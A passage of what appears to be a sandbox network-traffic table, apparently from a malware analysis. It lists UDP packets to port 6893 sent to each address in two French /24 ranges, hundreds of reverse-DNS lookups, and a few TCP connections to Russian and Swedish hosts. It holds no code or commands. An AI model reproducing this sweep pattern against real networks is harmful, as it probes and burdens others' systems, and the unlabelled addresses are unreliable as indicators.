| FR | 87.98.178.242:6893 | udp | |
| FR | 87.98.178.243:6893 | udp | |
| FR | 87.98.178.244:6893 | udp | |
| FR | 87.98.178.245:6893 | udp | |
| FR | 87.98.178.246:6893 | udp | |
| FR | 87.98.178.247:6893 | udp | |
| FR | 87.98.178.248:6893 | udp | |
| FR | 87.98.178.249:6893 | udp | |
| FR | 87.98.178.250:6893 | udp | |
| FR | 87.98.178.251:6893 | udp | |
| FR | 87.98.178.252:6893 | udp | |
| FR | 87.98.178.253:6893 | udp | |
| FR | 87.98.178.254:6893 | udp | |
| US | 8.8.8.8:53 | 2.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 4.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 5.176.98.87.in-addr.arpa | udp |
| RU | 91.218.114.26:80 | 91.218.114.26 | tcp |
| US | 8.8.8.8:53 | 6.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 7.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 10.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 12.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 16.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 17.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 20.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 24.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 27.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 29.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 30.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 32.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 33.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 34.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 35.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 36.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 37.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 38.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 39.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 40.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 42.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 44.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 45.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 46.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 47.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 48.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 49.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 51.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 52.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 53.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 54.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 55.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 57.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 59.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 60.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 61.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 62.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 63.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 64.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 65.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 66.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 68.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 69.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 70.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 71.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 72.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 74.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 75.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 76.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 77.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 78.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 79.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 80.176.98.87.in-addr.arpa | udp |
| FR | 87.98.178.255:6893 | udp | |
| FR | 87.98.179.0:6893 | udp | |
| FR | 87.98.179.1:6893 | udp | |
| FR | 87.98.179.2:6893 | udp | |
| FR | 87.98.179.3:6893 | udp | |
| FR | 87.98.179.4:6893 | udp | |
| FR | 87.98.179.5:6893 | udp | |
| FR | 87.98.179.6:6893 | udp | |
| FR | 87.98.179.7:6893 | udp | |
| FR | 87.98.179.8:6893 | udp | |
| FR | 87.98.179.9:6893 | udp | |
| FR | 87.98.179.10:6893 | udp | |
| FR | 87.98.179.11:6893 | udp | |
| FR | 87.98.179.12:6893 | udp | |
| FR | 87.98.179.13:6893 | udp | |
| FR | 87.98.179.14:6893 | udp | |
| FR | 87.98.179.15:6893 | udp | |
| FR | 87.98.179.16:6893 | udp | |
| FR | 87.98.179.17:6893 | udp | |
| FR | 87.98.179.18:6893 | udp | |
| FR | 87.98.179.19:6893 | udp | |
| FR | 87.98.179.20:6893 | udp | |
| FR | 87.98.179.21:6893 | udp | |
| FR | 87.98.179.22:6893 | udp | |
| FR | 87.98.179.23:6893 | udp | |
| FR | 87.98.179.24:6893 | udp | |
| FR | 87.98.179.25:6893 | udp | |
| FR | 87.98.179.26:6893 | udp | |
| FR | 87.98.179.27:6893 | udp | |
| FR | 87.98.179.28:6893 | udp | |
| FR | 87.98.179.29:6893 | udp | |
| FR | 87.98.179.30:6893 | udp | |
| FR | 87.98.179.31:6893 | udp | |
| FR | 87.98.179.32:6893 | udp | |
| FR | 87.98.179.33:6893 | udp | |
| FR | 87.98.179.34:6893 | udp | |
| FR | 87.98.179.35:6893 | udp | |
| FR | 87.98.179.36:6893 | udp | |
| FR | 87.98.179.37:6893 | udp | |
| FR | 87.98.179.38:6893 | udp | |
| FR | 87.98.179.39:6893 | udp | |
| FR | 87.98.179.40:6893 | udp | |
| FR | 87.98.179.41:6893 | udp | |
| FR | 87.98.179.42:6893 | udp | |
| FR | 87.98.179.43:6893 | udp | |
| FR | 87.98.179.44:6893 | udp | |
| FR | 87.98.179.45:6893 | udp | |
| FR | 87.98.179.46:6893 | udp | |
| FR | 87.98.179.47:6893 | udp | |
| FR | 87.98.179.48:6893 | udp | |
| FR | 87.98.179.49:6893 | udp | |
| FR | 87.98.179.50:6893 | udp | |
| FR | 87.98.179.51:6893 | udp | |
| FR | 87.98.179.52:6893 | udp | |
| FR | 87.98.179.53:6893 | udp | |
| US | 8.8.8.8:53 | 81.176.98.87.in-addr.arpa | udp |
| FR | 87.98.179.54:6893 | udp | |
| FR | 87.98.179.55:6893 | udp | |
| FR | 87.98.179.56:6893 | udp | |
| FR | 87.98.179.57:6893 | udp | |
| FR | 87.98.179.58:6893 | udp | |
| FR | 87.98.179.59:6893 | udp | |
| FR | 87.98.179.60:6893 | udp | |
| FR | 87.98.179.61:6893 | udp | |
| FR | 87.98.179.62:6893 | udp | |
| FR | 87.98.179.63:6893 | udp | |
| FR | 87.98.179.64:6893 | udp | |
| FR | 87.98.179.65:6893 | udp | |
| FR | 87.98.179.66:6893 | udp | |
| FR | 87.98.179.67:6893 | udp | |
| FR | 87.98.179.68:6893 | udp | |
| FR | 87.98.179.69:6893 | udp | |
| FR | 87.98.179.70:6893 | udp | |
| FR | 87.98.179.71:6893 | udp | |
| FR | 87.98.179.72:6893 | udp | |
| FR | 87.98.179.73:6893 | udp | |
| FR | 87.98.179.74:6893 | udp | |
| FR | 87.98.179.75:6893 | udp | |
| FR | 87.98.179.76:6893 | udp | |
| FR | 87.98.179.77:6893 | udp | |
| FR | 87.98.179.78:6893 | udp | |
| FR | 87.98.179.79:6893 | udp | |
| FR | 87.98.179.80:6893 | udp | |
| FR | 87.98.179.81:6893 | udp | |
| FR | 87.98.179.82:6893 | udp | |
| FR | 87.98.179.83:6893 | udp | |
| FR | 87.98.179.84:6893 | udp | |
| FR | 87.98.179.85:6893 | udp | |
| FR | 87.98.179.86:6893 | udp | |
| FR | 87.98.179.87:6893 | udp | |
| FR | 87.98.179.88:6893 | udp | |
| FR | 87.98.179.89:6893 | udp | |
| FR | 87.98.179.90:6893 | udp | |
| FR | 87.98.179.91:6893 | udp | |
| FR | 87.98.179.92:6893 | udp | |
| FR | 87.98.179.93:6893 | udp | |
| FR | 87.98.179.94:6893 | udp | |
| FR | 87.98.179.95:6893 | udp | |
| FR | 87.98.179.96:6893 | udp | |
| FR | 87.98.179.97:6893 | udp | |
| FR | 87.98.179.98:6893 | udp | |
| FR | 87.98.179.99:6893 | udp | |
| FR | 87.98.179.100:6893 | udp | |
| FR | 87.98.179.101:6893 | udp | |
| FR | 87.98.179.102:6893 | udp | |
| FR | 87.98.179.103:6893 | udp | |
| FR | 87.98.179.104:6893 | udp | |
| FR | 87.98.179.105:6893 | udp | |
| FR | 87.98.179.106:6893 | udp | |
| FR | 87.98.179.107:6893 | udp | |
| FR | 87.98.179.108:6893 | udp | |
| FR | 87.98.179.109:6893 | udp | |
| FR | 87.98.179.110:6893 | udp | |
| FR | 87.98.179.111:6893 | udp | |
| FR | 87.98.179.112:6893 | udp | |
| FR | 87.98.179.113:6893 | udp | |
| FR | 87.98.179.114:6893 | udp | |
| FR | 87.98.179.115:6893 | udp | |
| FR | 87.98.179.116:6893 | udp | |
| FR | 87.98.179.117:6893 | udp | |
| FR | 87.98.179.118:6893 | udp | |
| FR | 87.98.179.119:6893 | udp | |
| FR | 87.98.179.120:6893 | udp | |
| FR | 87.98.179.121:6893 | udp | |
| FR | 87.98.179.122:6893 | udp | |
| FR | 87.98.179.123:6893 | udp | |
| FR | 87.98.179.124:6893 | udp | |
| FR | 87.98.179.125:6893 | udp | |
| FR | 87.98.179.126:6893 | udp | |
| FR | 87.98.179.127:6893 | udp | |
| FR | 87.98.179.128:6893 | udp | |
| FR | 87.98.179.129:6893 | udp | |
| FR | 87.98.179.130:6893 | udp | |
| FR | 87.98.179.131:6893 | udp | |
| FR | 87.98.179.132:6893 | udp | |
| FR | 87.98.179.133:6893 | udp | |
| FR | 87.98.179.134:6893 | udp | |
| FR | 87.98.179.135:6893 | udp | |
| FR | 87.98.179.136:6893 | udp | |
| FR | 87.98.179.137:6893 | udp | |
| FR | 87.98.179.138:6893 | udp | |
| FR | 87.98.179.139:6893 | udp | |
| FR | 87.98.179.140:6893 | udp | |
| FR | 87.98.179.141:6893 | udp | |
| FR | 87.98.179.142:6893 | udp | |
| FR | 87.98.179.143:6893 | udp | |
| FR | 87.98.179.144:6893 | udp | |
| FR | 87.98.179.145:6893 | udp | |
| FR | 87.98.179.146:6893 | udp | |
| FR | 87.98.179.147:6893 | udp | |
| FR | 87.98.179.148:6893 | udp | |
| FR | 87.98.179.149:6893 | udp | |
| FR | 87.98.179.150:6893 | udp | |
| FR | 87.98.179.151:6893 | udp | |
| FR | 87.98.179.152:6893 | udp | |
| FR | 87.98.179.153:6893 | udp | |
| FR | 87.98.179.154:6893 | udp | |
| FR | 87.98.179.155:6893 | udp | |
| FR | 87.98.179.156:6893 | udp | |
| FR | 87.98.179.157:6893 | udp | |
| FR | 87.98.179.158:6893 | udp | |
| FR | 87.98.179.159:6893 | udp | |
| FR | 87.98.179.160:6893 | udp | |
| FR | 87.98.179.161:6893 | udp | |
| FR | 87.98.179.162:6893 | udp | |
| FR | 87.98.179.163:6893 | udp | |
| FR | 87.98.179.164:6893 | udp | |
| FR | 87.98.179.165:6893 | udp | |
| FR | 87.98.179.166:6893 | udp | |
| FR | 87.98.179.167:6893 | udp | |
| FR | 87.98.179.168:6893 | udp | |
| FR | 87.98.179.169:6893 | udp | |
| FR | 87.98.179.170:6893 | udp | |
| FR | 87.98.179.171:6893 | udp | |
| FR | 87.98.179.172:6893 | udp | |
| FR | 87.98.179.173:6893 | udp | |
| FR | 87.98.179.174:6893 | udp | |
| FR | 87.98.179.175:6893 | udp | |
| FR | 87.98.179.176:6893 | udp | |
| FR | 87.98.179.177:6893 | udp | |
| FR | 87.98.179.178:6893 | udp | |
| FR | 87.98.179.179:6893 | udp | |
| FR | 87.98.179.180:6893 | udp | |
| FR | 87.98.179.181:6893 | udp | |
| FR | 87.98.179.182:6893 | udp | |
| FR | 87.98.179.183:6893 | udp | |
| FR | 87.98.179.184:6893 | udp | |
| FR | 87.98.179.185:6893 | udp | |
| FR | 87.98.179.186:6893 | udp | |
| FR | 87.98.179.187:6893 | udp | |
| FR | 87.98.179.188:6893 | udp | |
| FR | 87.98.179.189:6893 | udp | |
| FR | 87.98.179.190:6893 | udp | |
| FR | 87.98.179.191:6893 | udp | |
| FR | 87.98.179.192:6893 | udp | |
| FR | 87.98.179.193:6893 | udp | |
| FR | 87.98.179.194:6893 | udp | |
| FR | 87.98.179.195:6893 | udp | |
| FR | 87.98.179.196:6893 | udp | |
| FR | 87.98.179.197:6893 | udp | |
| FR | 87.98.179.198:6893 | udp | |
| FR | 87.98.179.199:6893 | udp | |
| FR | 87.98.179.200:6893 | udp | |
| FR | 87.98.179.201:6893 | udp | |
| FR | 87.98.179.202:6893 | udp | |
| FR | 87.98.179.203:6893 | udp | |
| FR | 87.98.179.204:6893 | udp | |
| FR | 87.98.179.205:6893 | udp | |
| FR | 87.98.179.206:6893 | udp | |
| FR | 87.98.179.207:6893 | udp | |
| FR | 87.98.179.208:6893 | udp | |
| FR | 87.98.179.209:6893 | udp | |
| FR | 87.98.179.210:6893 | udp | |
| FR | 87.98.179.211:6893 | udp | |
| FR | 87.98.179.212:6893 | udp | |
| FR | 87.98.179.213:6893 | udp | |
| FR | 87.98.179.214:6893 | udp | |
| FR | 87.98.179.215:6893 | udp | |
| FR | 87.98.179.216:6893 | udp | |
| FR | 87.98.179.217:6893 | udp | |
| FR | 87.98.179.218:6893 | udp | |
| FR | 87.98.179.219:6893 | udp | |
| FR | 87.98.179.220:6893 | udp | |
| FR | 87.98.179.221:6893 | udp | |
| FR | 87.98.179.222:6893 | udp | |
| FR | 87.98.179.223:6893 | udp | |
| FR | 87.98.179.224:6893 | udp | |
| FR | 87.98.179.225:6893 | udp | |
| FR | 87.98.179.226:6893 | udp | |
| FR | 87.98.179.227:6893 | udp | |
| FR | 87.98.179.228:6893 | udp | |
| FR | 87.98.179.229:6893 | udp | |
| FR | 87.98.179.230:6893 | udp | |
| FR | 87.98.179.231:6893 | udp | |
| FR | 87.98.179.232:6893 | udp | |
| FR | 87.98.179.233:6893 | udp | |
| FR | 87.98.179.234:6893 | udp | |
| FR | 87.98.179.235:6893 | udp | |
| FR | 87.98.179.236:6893 | udp | |
| FR | 87.98.179.237:6893 | udp | |
| FR | 87.98.179.238:6893 | udp | |
| FR | 87.98.179.239:6893 | udp | |
| FR | 87.98.179.240:6893 | udp | |
| FR | 87.98.179.241:6893 | udp | |
| FR | 87.98.179.242:6893 | udp | |
| FR | 87.98.179.243:6893 | udp | |
| FR | 87.98.179.244:6893 | udp | |
| FR | 87.98.179.245:6893 | udp | |
| FR | 87.98.179.246:6893 | udp | |
| FR | 87.98.179.247:6893 | udp | |
| FR | 87.98.179.248:6893 | udp | |
| FR | 87.98.179.249:6893 | udp | |
| FR | 87.98.179.250:6893 | udp | |
| FR | 87.98.179.251:6893 | udp | |
| FR | 87.98.179.252:6893 | udp | |
| FR | 87.98.179.253:6893 | udp | |
| FR | 87.98.179.254:6893 | udp | |
| US | 8.8.8.8:53 | 82.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 83.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 84.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 85.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 87.176.98.87.in-addr.arpa | udp |
| RU | 91.218.114.26:80 | 91.218.114.26 | tcp |
| US | 8.8.8.8:53 | 88.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 89.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 90.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 92.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 91.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 93.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 94.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 96.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 98.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 99.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 100.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 101.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 102.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.176.98.87.in-addr.arpa | udp |
| FR | 87.98.179.255:6893 | udp | |
| US | 8.8.8.8:53 | 104.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 105.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 106.176.98.87.in-addr.arpa | udp |
| RU | 91.218.114.31:80 | tcp | |
| US | 8.8.8.8:53 | 107.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 108.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 109.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 110.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 111.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 112.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 113.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 114.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 115.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 116.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 117.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 118.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 119.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 120.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 121.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 122.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 123.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 124.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 125.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 126.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 127.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 128.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 129.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 130.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 132.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 131.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 134.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 135.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 136.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 137.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 138.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 139.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 140.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 141.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 142.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 143.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 144.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 145.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 146.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 147.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 148.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.176.98.87.in-addr.arpa | udp |
| SE | 171.25.193.9:80 | tcp | |
| US | 8.8.8.8:53 | 150.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 151.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 152.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 153.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 155.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 156.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 158.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 159.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 160.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 161.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 162.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 163.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 164.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 165.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 166.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 167.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 168.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 169.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 170.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 173.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 174.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 175.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 176.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 177.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 178.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 179.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 180.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 181.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 182.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 184.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 185.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 186.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 187.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 188.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 189.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 190.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 191.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 192.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 193.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 194.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 195.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 197.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 199.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 201.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 202.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 204.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 205.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 208.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 207.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 210.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 211.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 212.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 213.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 214.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 216.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 218.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 219.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 220.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 221.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 222.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 223.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 224.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 225.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 226.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 227.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 229.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 231.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 230.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 233.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 234.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 235.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 236.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 238.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 239.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 242.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 243.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 244.176.98.87.in-addr.arpa | udp |
